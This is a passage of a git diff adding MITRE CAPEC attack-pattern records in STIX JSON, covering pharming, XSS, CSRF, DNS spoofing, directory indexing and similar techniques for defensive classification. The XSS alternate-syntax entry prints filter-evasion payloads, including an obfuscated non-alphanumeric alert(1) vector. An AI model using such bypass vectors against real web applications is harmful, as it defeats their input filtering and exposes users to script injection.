"bundle--9547ab04-5034-45e3-b57b-cbbeac08f374", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--66a47ab4-8af8-4181-a318-6b7a6c979201", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Pharming", + "description": "A pharming attack occurs when the victim is fooled into entering sensitive data into supposedly trusted locations, such as an online bank site or a trading platform. An attacker can impersonate these supposedly trusted sites and have the victim be directed to his site rather than the originally intended one. Pharming does not require script injection or clicking on malicious links for the attack to succeed.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/89.html", + "external_id": "CAPEC-89" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html", + "external_id": "CWE-346" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html", + "external_id": "CWE-350" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_example_instances": [ + "\n An online bank website requires users to provide their customer ID and password to log on, but does not use a secure connection.\n An attacker can setup a similar fake site and leverage pharming to collect this information from unknowing victims.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Vulnerable DNS software or improperly protected hosts file or router that can be poisoned", + "A website that handles sensitive information but does not use a secure connection and a certificate that is valid is also prone to pharming" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Having knowledge of the way the target site has been structured, in order to create a fake version, is required. Poisoning the resolver requires knowledge of a vulnerability that can be exploited." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to be able to poison the resolver - DNS entries or local hosts file or router entry pointing to a trusted DNS server - in order to successfully carry out a pharming attack. Setting up a fake website, identical to the targeted one, does not require special skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--670f9af9-29b0-46fb-b6b5-46bf74fd2a79.json b/capec/attack-pattern/attack-pattern--670f9af9-29b0-46fb-b6b5-46bf74fd2a79.json new file mode 100644 index 0000000000..323bc774a0 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--670f9af9-29b0-46fb-b6b5-46bf74fd2a79.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--c81cf3cc-7daf-4bf2-9651-fbafb5886c5b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--670f9af9-29b0-46fb-b6b5-46bf74fd2a79", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Artificially Inflate File Sizes", + "description": "Security tools often inspect executables to determine if they are malicious. Adversaries may add data to executables to increase the executable size beyond what security tools are capable of handling. Adding data to an executable also changes the file's hash, frustrating security tools that look for known bad files by their hash.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/572.html", + "external_id": "CAPEC-572" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--67562799-2d10-4e76-b3da-649c6d844340.json b/capec/attack-pattern/attack-pattern--67562799-2d10-4e76-b3da-649c6d844340.json new file mode 100644 index 0000000000..ef479e9155 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--67562799-2d10-4e76-b3da-649c6d844340.json @@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--3d6fdfdb-ef56-4c18-a027-3434bb52a614", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Cross-Site Scripting (XSS)", + "description": "An adversary embeds malicious scripts in content that will be served to web browsers. The goal of the attack is for the target software, the client-side browser, to execute the script with the users' privilege level. An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute code and scripts. Web browsers, for example, have some simple security controls in place, but if a remote attacker is allowed to execute scripts (through injecting them in to user-generated content like bulletin boards) then these controls may be bypassed. Further, these attacks are very difficult for an end user to detect.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/63.html", + "external_id": "CAPEC-63" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html", + "external_id": "CWE-79" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n Classic phishing attacks lure users to click on content that appears trustworthy, such as logos, and links that seem to go to their trusted financial institutions and online auction sites. But instead the attacker appends malicious scripts into the otherwise innocent appearing resources. The HTML source for a standard phishing attack looks like this:\n maliciousscript\">Trusted Site\n When the user clicks the link, the appended script also executes on the local user's machine.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must be a client that allows scripting communication from remote hosts, such as a JavaScript-enabled Web Browser." + ], + "x_capec_resources_required": [ + "Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine." + ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an attacker can simply place a script in bulletin board, blog, wiki, or other user-generated content site that are echoed back to other client machines." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6756a7a2-9937-4bd1-9c61-66b1fbe0379f.json b/capec/attack-pattern/attack-pattern--6756a7a2-9937-4bd1-9c61-66b1fbe0379f.json new file mode 100644 index 0000000000..0c348da076 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6756a7a2-9937-4bd1-9c61-66b1fbe0379f.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--543a3898-3881-4355-9923-ad2a828d24eb", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6756a7a2-9937-4bd1-9c61-66b1fbe0379f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Data Interchange Protocol Manipulation", + "description": "Data Interchange Protocols are used to transmit structured data between entities. These protocols are often specific to a particular domain (B2B: purchase orders, invoices, transport logistics and waybills, medical records). They are often, but not always, XML-based. Subverting the protocol can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/277.html", + "external_id": "CAPEC-277" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651.json b/capec/attack-pattern/attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651.json new file mode 100644 index 0000000000..b78049fa4e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--cac301e7-0aa2-40fb-a8ab-9830a2d0e7b5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DNS Spoofing", + "description": "An adversary sends a malicious (\"NXDOMAIN\" (\"No such domain\") code, or DNS A record) response to a targets route request before a legitimate resolver can. This technique requires an On-path or In-path device that can monitor and respond to the targets DNS requests. This attack differs from BGP Tampering in that it directly responds to requests made by the target instead of polluting the routing the targets infrastructure uses.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/598.html", + "external_id": "CAPEC-598" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John-Paul Verkamp, Minaxi Gupta, Inferring Mechanics of Web Censorship Around the World, 2012, USENIX", + "external_id": "REF-477" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Anonymous, Towards a Comprehensive Picture of the Great Firewall's DNS Censorship, 2014, USENIX", + "external_id": "REF-479" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "Below-Recursive DNS Poisoning: When an On/In-path device between a recursive DNS server and a user sends a malicious (\"NXDOMAIN\" (\"No such domain\") code, or DNS A record ) response before a legitimate resolver can.", + "Above-Recursive DNS Poisoning: When an On/In-path device between an authority server (e.g., government-managed) and a recursive DNS server sends a malicious (\"NXDOMAIN\" (\"No such domain\")code, or a DNS record) response before a legitimate resolver can." + ], + "x_capec_prerequisites": [ + "On/In Path Device" + ], + "x_capec_skills_required": { + "Low": "To distribute email" + }, + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--69028f38-a6b7-4838-a9b7-7a4d94ac942a.json b/capec/attack-pattern/attack-pattern--69028f38-a6b7-4838-a9b7-7a4d94ac942a.json new file mode 100644 index 0000000000..47bb969d35 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--69028f38-a6b7-4838-a9b7-7a4d94ac942a.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--4e91874c-41c8-4c93-8945-b97b167af657", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--69028f38-a6b7-4838-a9b7-7a4d94ac942a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Malicious Logic Insertion via Inclusion of Counterfeit Hardware Components", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-457 : Malicious Logic Insertion into Product Hardware. Please refer to this other pattern going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/455.html", + "external_id": "CAPEC-455" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459.json b/capec/attack-pattern/attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459.json new file mode 100644 index 0000000000..eabec073ef --- /dev/null +++ b/capec/attack-pattern/attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459.json @@ -0,0 +1,98 @@ +{ + "type": "bundle", + "id": "bundle--2037d9a5-dfac-4218-bf7f-06cc834b28b7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "XSS Using Alternate Syntax", + "description": "An adversary uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case insensitive manner. If the site's web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, the \"script\" tag using the alternate forms of \"Script\" or \"ScRiPt\" may bypass filters where \"script\" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/199.html", + "external_id": "CAPEC-199" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/87.html", + "external_id": "CWE-87" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP Cheatsheets, The Open Web Application Security Project (OWASP)", + "url": "https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet", + "external_id": "REF-69" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP Testing Guide (v2), The Open Web Application Security Project (OWASP)", + "url": "http://www.owasp.org/index.php/Testing_for_Cross_site_scripting", + "external_id": "REF-70" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Non-alphanumeric XSS cheat sheet", + "url": "http://sla.ckers.org/forum/read.php?24,28687", + "external_id": "REF-71" + }, + { + "source_name": "reference_from_CAPEC", + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "url": "http://projects.webappsec.org/Cross-Site+Scripting", + "external_id": "REF-72" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "\n In this example, the attacker tries to get executed by the victim's browser. The target application employs regular expressions to make sure no script is being passed through the application to the web page; such a regular expression could be ((?i)script), and the application would replace all matches by this regex by the empty string. An attacker will then create a special payload to bypass this filter:\n alert(1)\n when the applications gets this input string, it will replace all \"script\" (case insensitive) by the empty string and the resulting input will be the desired vector by the attacker:\n \n In this example, we assume that the application needs to write a particular string in a client-side JavaScript context (e.g., ). For the attacker to execute the same payload as in the previous example, he would need to send alert(1) if there was no filtering. The application makes use of the following regular expression as filter\n ((\\w+)\\s*\\(.*\\)|alert|eval|function|document)\n and replaces all matches by the empty string. For example each occurrence of alert(), eval(), foo() or even the string \"alert\" would be stripped. An attacker will then create a special payload to bypass this filter:\n this['al' + 'ert'](1)\n when the applications gets this input string, it won't replace anything and this piece of JavaScript has exactly the same runtime meaning as alert(1). The attacker could also have used non-alphanumeric XSS vectors to bypass the filter; for example,\n ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)\n would be executed by the JavaScript engine like alert(1) is.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must allow scripting such as JavaScript." + ], + "x_capec_resources_required": [ + "Ability to send HTTP request to a web application." + ], + "x_capec_skills_required": { + "High": "To bypass non trivial filters in the application", + "Low": "To inject the malicious payload in a web page" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6991f840-6337-464f-8e9e-e6300b4e32d7.json b/capec/attack-pattern/attack-pattern--6991f840-6337-464f-8e9e-e6300b4e32d7.json new file mode 100644 index 0000000000..e2e4406ff1 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6991f840-6337-464f-8e9e-e6300b4e32d7.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--2316b176-6d1f-42aa-afbe-738de4609a0b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6991f840-6337-464f-8e9e-e6300b4e32d7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Create files with the same name as files protected with a higher classification", + "description": "An attacker exploits file location algorithms in an operating system or application by creating a file with the same name as a protected or privileged file. The attacker could manipulate the system if the attacker-created file is trusted by the operating system or an application component that attempts to load the original file. Applications often load or include external files, such as libraries or configuration files. These files should be protected against malicious manipulation. However, if the application only uses the name of the file when locating it, an attacker may be able to create a file with the same name and place it in a directory that the application will search before the directory with the legitimate file is searched. Because the attackers' file is discovered first, it would be used by the target application. This attack can be extremely destructive if the referenced file is executable and/or is granted special privileges based solely on having a particular name.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/177.html", + "external_id": "CAPEC-177" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/706.html", + "external_id": "CWE-706" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The target application must include external files. Most non-trivial applications meet this criterion.", + "The target application does not verify that a located file is the one it was looking for through means other than the name. Many applications fail to perform checks of this type.", + "The directories the target application searches to find the included file include directories writable by the attacker which are searched before the protected directory containing the actual files. It is much less common for applications to meet this criterion, but if an attacker can manipulate the application's search path (possibly by controlling environmental variables) then they can force this criterion to be met." + ], + "x_capec_resources_required": [ + "The attacker must have sufficient access to place an arbitrarily named file somewhere early in the application's search path." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--69f7ae46-ecf7-4550-a92f-dd3fc65ac086.json b/capec/attack-pattern/attack-pattern--69f7ae46-ecf7-4550-a92f-dd3fc65ac086.json new file mode 100644 index 0000000000..e8efe4d5e6 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--69f7ae46-ecf7-4550-a92f-dd3fc65ac086.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--71a4a08d-45c0-4ab8-85c2-d244c9d99bd2", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--69f7ae46-ecf7-4550-a92f-dd3fc65ac086", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "USB Memory Attacks", + "description": "An adversary loads malicious code onto a USB memory stick in order to infect any system which the device is plugged in to. USB drives present a significant security risk for business and government agencies. Given the ability to integrate wireless functionality into a USB stick, it is possible to design malware that not only steals confidential data, but sniffs the network, or monitor keystrokes, and then exfiltrates the stolen data off-site via a Wireless connection. Also, viruses can be transmitted via the USB interface without the specific use of a memory stick. The attacks from USB devices are often of such sophistication that experts conclude they are not the work of single individuals, but suggest state sponsorship. These attacks can be performed by an adversary with direct access to a target system or can be executed via means such as USB Drop Attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/457.html", + "external_id": "CAPEC-457" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Information Technology Laboratory, Supply Chain Risk Management (SCRM), 2010, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Some level of physical access to the device being attacked.", + "Information pertaining to the target organization on how to best execute a USB Drop Attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6ae118bd-2893-4883-aa2c-f1721143de1f.json b/capec/attack-pattern/attack-pattern--6ae118bd-2893-4883-aa2c-f1721143de1f.json new file mode 100644 index 0000000000..5dcdc1f437 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6ae118bd-2893-4883-aa2c-f1721143de1f.json @@ -0,0 +1,89 @@ +{ + "type": "bundle", + "id": "bundle--d56a8fd7-a745-46c0-9bcf-915c567ca27b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6ae118bd-2893-4883-aa2c-f1721143de1f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cross Site Request Forgery", + "description": "An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply \"riding\" the existing session cookie.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/62.html", + "external_id": "CAPEC-62" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html", + "external_id": "CWE-352" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html", + "external_id": "CWE-306" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html", + "external_id": "CWE-664" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html", + "external_id": "CWE-732" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/716.html", + "external_id": "CWE-716" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Thomas Schreiber, Session Riding: A Widespread Vulnerability in Today's Web Applications, SecureNet GmbH", + "url": "https://crypto.stanford.edu/cs155old/cs155-spring08/papers/Session_Riding.pdf", + "external_id": "REF-62" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Session Riding" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n While a user is logged into his bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.\n The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.\n The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.See also: Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_resources_required": [ + "All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to figure out the exact invocation of the targeted malicious action and then craft a link that performs the said action. Having the user click on such a link is often accomplished by sending an email or posting such a link to a bulletin board or the likes." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6b71d1a3-f57c-4c58-83c7-a7c44c55ab2d.json b/capec/attack-pattern/attack-pattern--6b71d1a3-f57c-4c58-83c7-a7c44c55ab2d.json new file mode 100644 index 0000000000..2ad130f87c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6b71d1a3-f57c-4c58-83c7-a7c44c55ab2d.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--9d55e14e-4fd9-4be9-9a36-77a05aa9315e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6b71d1a3-f57c-4c58-83c7-a7c44c55ab2d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Probe Audio and Video Peripherals", + "description": "The adversary exploits the target system's audio and video functionalities through malware or scheduled tasks. The goal is to capture sensitive information about the target for financial, personal, political, or other gains which is accomplished by collecting communication data between two parties via the use of peripheral devices (e.g. microphones and webcams) or applications with audio and video capabilities (e.g. Skype) on a system.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/634.html", + "external_id": "CAPEC-634" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html", + "external_id": "CWE-267" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_example_instances": [ + "An adversary can capture audio and video, and transmit the recordings to a C2 server or a similar capability." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Knowledge of the target device's or application\u2019s vulnerabilities that can be capitalized on with malicious code. The adversary must be able to place the malicious code on the target device." + ], + "x_capec_skills_required": { + "High": "To deploy a hidden process or malware on the system to automatically collect audio and video data." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6c510676-03ad-4a8e-835b-f2caea51b785.json b/capec/attack-pattern/attack-pattern--6c510676-03ad-4a8e-835b-f2caea51b785.json new file mode 100644 index 0000000000..7640b7d85f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6c510676-03ad-4a8e-835b-f2caea51b785.json @@ -0,0 +1,98 @@ +{ + "type": "bundle", + "id": "bundle--63f7f65c-0fab-43f8-aa68-eba81965c839", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6c510676-03ad-4a8e-835b-f2caea51b785", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Directory Indexing", + "description": "An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/127.html", + "external_id": "CAPEC-127" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/424.html", + "external_id": "CWE-424" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html", + "external_id": "CWE-425" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/288.html", + "external_id": "CWE-288" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html", + "external_id": "CWE-285" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html", + "external_id": "CWE-732" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html", + "external_id": "CWE-276" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/721.html", + "external_id": "CWE-721" + }, + { + "source_name": "reference_from_CAPEC", + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "url": "http://projects.webappsec.org/Directory-Indexing", + "external_id": "REF-11" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Information Leakage)" + ] + }, + "x_capec_example_instances": [ + "\n The adversary uses directory listing to view sensitive files in the application. This is an example of accessing the backup file. The attack issues a request for http://www.example.com/admin/ and receives the following dynamic directory indexing content in the response: Index of /admin Name Last Modified Size Description backup/ 31-May-2007 08:18 - Apache/ 2.0.55 Server at www.example.com Port 80\n The target application does not have direct hyperlink to the \"backup\" directory in the normal html webpage, however the attacker has learned of this directory due to indexing the content. The client then requests the backup directory URL and receives output which has a 